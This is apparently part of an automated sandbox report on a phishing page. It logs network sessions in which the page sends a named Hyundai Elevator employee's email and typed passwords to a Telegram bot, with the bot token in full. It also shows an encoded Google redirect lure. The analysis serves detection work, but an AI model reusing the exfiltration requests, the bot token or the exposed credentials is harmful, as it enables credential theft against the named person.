                                  Data Ascii: 108{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"hyundaielevator.com.","type":15}],"Answer":[{"name":"hyundaielevator.com.","type":15,"TTL":3600,"data":"10 mailin.hyundaigroup.com."}],"Comment":"Response from 205.
                                  2025-01-06 03:56:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.4497648.8.4.44431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:34 UTC374OUTGET /resolve?name=hyundaielevator.com&type=MX HTTP/1.1
                                  Host: dns.google
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:35 UTC548INHTTP/1.1 200 OK
                                  X-Content-Type-Options: nosniff
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                  Access-Control-Allow-Origin: *
                                  Date: Mon, 06 Jan 2025 03:56:34 GMT
                                  Expires: Mon, 06 Jan 2025 03:56:34 GMT
                                  Cache-Control: private, max-age=3600
                                  Content-Type: application/json; charset=UTF-8
                                  Server: HTTP server (unknown)
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Accept-Ranges: none
                                  Vary: Accept-Encoding
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2025-01-06 03:56:35 UTC270INData Raw: 31 30 37 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 35 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 68 79 75 6e 64 61 69 65 6c 65 76 61 74 6f 72 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 35 2c 22 54 54 4c 22 3a 33 36 30 30 2c 22 64 61 74 61 22 3a 22 31 30 20 6d 61 69 6c 69 6e 2e 68 79 75 6e 64 61 69 67 72 6f 75 70 2e 63 6f 6d 2e 22 7d 5d 2c 22 43 6f 6d 6d 65 6e 74 22 3a 22 52 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 32 30 35 2e
                                  Data Ascii: 107{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"hyundaielevator.com.","type":15}],"Answer":[{"name":"hyundaielevator.com.","type":15,"TTL":3600,"data":"10 mailin.hyundaigroup.com."}],"Comment":"Response from 205.
                                  2025-01-06 03:56:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.449765149.154.167.2204431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:35 UTC1044OUTGET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage?chat_id=1739269434&text=GODLY%20LOGS%0AEmail%3A%20changyeol.choi%40hyundaielevator.com%0APassword%3A%20d)pC%26w%2C%3F%23FiHs0%0AIP%3A%208.46.123.189%0ABrowser%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%0ADate%20and%20Time%3A%201%2F5%2F2025%2C%2010%3A56%3A33%20PM%0AMX%20Records%3A%2010%20mailin.hyundaigroup.com. HTTP/1.1
                                  Host: api.telegram.org
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Origin: http://phil-health-uk.glitch.me
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: http://phil-health-uk.glitch.me/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:35 UTC388INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Mon, 06 Jan 2025 03:56:35 GMT
                                  Content-Type: application/json
                                  Content-Length: 767
                                  Connection: close
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                  2025-01-06 03:56:35 UTC767INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 33 35 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 35 31 33 30 38 31 33 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 69 67 62 69 67 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 70 69 73 61 70 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 37 33 39 32 36 39 34 33 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 6f 72 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 5f 6d 6f 6f 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 31 33 35 37 39 35 2c 22 74 65 78 74 22 3a 22 47 4f 44
                                  Data Ascii: {"ok":true,"result":{"message_id":23541,"from":{"id":7051308130,"is_bot":true,"first_name":"Bigbig","username":"sipisapabot"},"chat":{"id":1739269434,"first_name":"L","last_name":"Moore","username":"L_moore","type":"private"},"date":1736135795,"text":"GOD


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.449766149.154.167.2204431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:35 UTC824OUTGET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage?chat_id=1739269434&text=GODLY%20LOGS%0AEmail%3A%20changyeol.choi%40hyundaielevator.com%0APassword%3A%20d)pC%26w%2C%3F%23FiHs0%0AIP%3A%208.46.123.189%0ABrowser%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%0ADate%20and%20Time%3A%201%2F5%2F2025%2C%2010%3A56%3A33%20PM%0AMX%20Records%3A%2010%20mailin.hyundaigroup.com. HTTP/1.1
                                  Host: api.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:36 UTC388INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Mon, 06 Jan 2025 03:56:36 GMT
                                  Content-Type: application/json
                                  Content-Length: 767
                                  Connection: close
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                  2025-01-06 03:56:36 UTC767INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 33 35 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 35 31 33 30 38 31 33 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 69 67 62 69 67 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 70 69 73 61 70 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 37 33 39 32 36 39 34 33 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 6f 72 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 5f 6d 6f 6f 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 31 33 35 37 39 36 2c 22 74 65 78 74 22 3a 22 47 4f 44
                                  Data Ascii: {"ok":true,"result":{"message_id":23542,"from":{"id":7051308130,"is_bot":true,"first_name":"Bigbig","username":"sipisapabot"},"chat":{"id":1739269434,"first_name":"L","last_name":"Moore","username":"L_moore","type":"private"},"date":1736135796,"text":"GOD


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.449767172.67.74.1524431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:57 UTC569OUTGET /?format=json HTTP/1.1
                                  Host: api.ipify.org
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Origin: http://phil-health-uk.glitch.me
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: http://phil-health-uk.glitch.me/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:57 UTC463INHTTP/1.1 200 OK
                                  Date: Mon, 06 Jan 2025 03:56:57 GMT
                                  Content-Type: application/json
                                  Content-Length: 21
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8fd8c7fcee0a7cf0-EWR
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2004&rtt_var=783&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1147&delivery_rate=1457085&cwnd=230&unsent_bytes=0&cid=6ead0ba3e5114555&ts=146&x=0"
                                  2025-01-06 03:56:57 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                  Data Ascii: {"ip":"8.46.123.189"}


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.449769172.67.74.1524431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:58 UTC349OUTGET /?format=json HTTP/1.1
                                  Host: api.ipify.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:58 UTC430INHTTP/1.1 200 OK
                                  Date: Mon, 06 Jan 2025 03:56:58 GMT
                                  Content-Type: application/json
                                  Content-Length: 21
                                  Connection: close
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8fd8c800dbedc323-EWR
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1629&rtt_var=626&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=927&delivery_rate=1725768&cwnd=214&unsent_bytes=0&cid=5d8530b9d9a79aa5&ts=155&x=0"
                                  2025-01-06 03:56:58 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                  Data Ascii: {"ip":"8.46.123.189"}


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.449768149.154.167.2204431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:58 UTC1038OUTGET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage?chat_id=1739269434&text=GODLY%20LOGS%0AEmail%3A%20changyeol.choi%40hyundaielevator.com%0APassword%3A%20)oRtTKtS4%24h4IW%0AIP%3A%208.46.123.189%0ABrowser%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%0ADate%20and%20Time%3A%201%2F5%2F2025%2C%2010%3A56%3A57%20PM%0AMX%20Records%3A%2010%20mailin.hyundaigroup.com. HTTP/1.1
                                  Host: api.telegram.org
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Origin: http://phil-health-uk.glitch.me
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: http://phil-health-uk.glitch.me/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:58 UTC388INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Mon, 06 Jan 2025 03:56:58 GMT
                                  Content-Type: application/json
                                  Content-Length: 725
                                  Connection: close
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                  2025-01-06 03:56:58 UTC725INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 33 35 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 35 31 33 30 38 31 33 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 69 67 62 69 67 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 70 69 73 61 70 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 37 33 39 32 36 39 34 33 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 6f 72 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 5f 6d 6f 6f 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 31 33 35 38 31 38 2c 22 74 65 78 74 22 3a 22 47 4f 44
                                  Data Ascii: {"ok":true,"result":{"message_id":23543,"from":{"id":7051308130,"is_bot":true,"first_name":"Bigbig","username":"sipisapabot"},"chat":{"id":1739269434,"first_name":"L","last_name":"Moore","username":"L_moore","type":"private"},"date":1736135818,"text":"GOD


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.449770149.154.167.2204431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-06 03:56:59 UTC818OUTGET /bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessage?chat_id=1739269434&text=GODLY%20LOGS%0AEmail%3A%20changyeol.choi%40hyundaielevator.com%0APassword%3A%20)oRtTKtS4%24h4IW%0AIP%3A%208.46.123.189%0ABrowser%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36%0ADate%20and%20Time%3A%201%2F5%2F2025%2C%2010%3A56%3A57%20PM%0AMX%20Records%3A%2010%20mailin.hyundaigroup.com. HTTP/1.1
                                  Host: api.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-06 03:56:59 UTC388INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Mon, 06 Jan 2025 03:56:59 GMT
                                  Content-Type: application/json
                                  Content-Length: 725
                                  Connection: close
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                  2025-01-06 03:56:59 UTC725INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 33 35 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 35 31 33 30 38 31 33 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 69 67 62 69 67 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 70 69 73 61 70 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 37 33 39 32 36 39 34 33 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 6f 72 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 5f 6d 6f 6f 72 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 31 33 35 38 31 39 2c 22 74 65 78 74 22 3a 22 47 4f 44
                                  Data Ascii: {"ok":true,"result":{"message_id":23544,"from":{"id":7051308130,"is_bot":true,"first_name":"Bigbig","username":"sipisapabot"},"chat":{"id":1739269434,"first_name":"L","last_name":"Moore","username":"L_moore","type":"private"},"date":1736135819,"text":"GOD


                                  Click to jump to process

                                  Click to jump to process

                                  Click to jump to process

                                  Target ID:0
                                  Start time:22:56:08
                                  Start date:05/01/2025
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                  Imagebase:0x7ff76e190000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:2
                                  Start time:22:56:11
                                  Start date:05/01/2025
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2260,i,6116481441488140002,9378863470170372530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                  Imagebase:0x7ff76e190000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:false

                                  Target ID:3
                                  Start time:22:56:17
                                  Start date:05/01/2025
                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=vyczmuFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%70%68%69%6C%2D%68%65%61%6C%74%68%2D%75%6B%2E%67%6C%69%74%63%68%2E%6D%65%2F#changyeol.choi@hyundaielevator.com"
                                  Imagebase:0x7ff76e190000
                                  File size:3'242'272 bytes
                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  No disassembly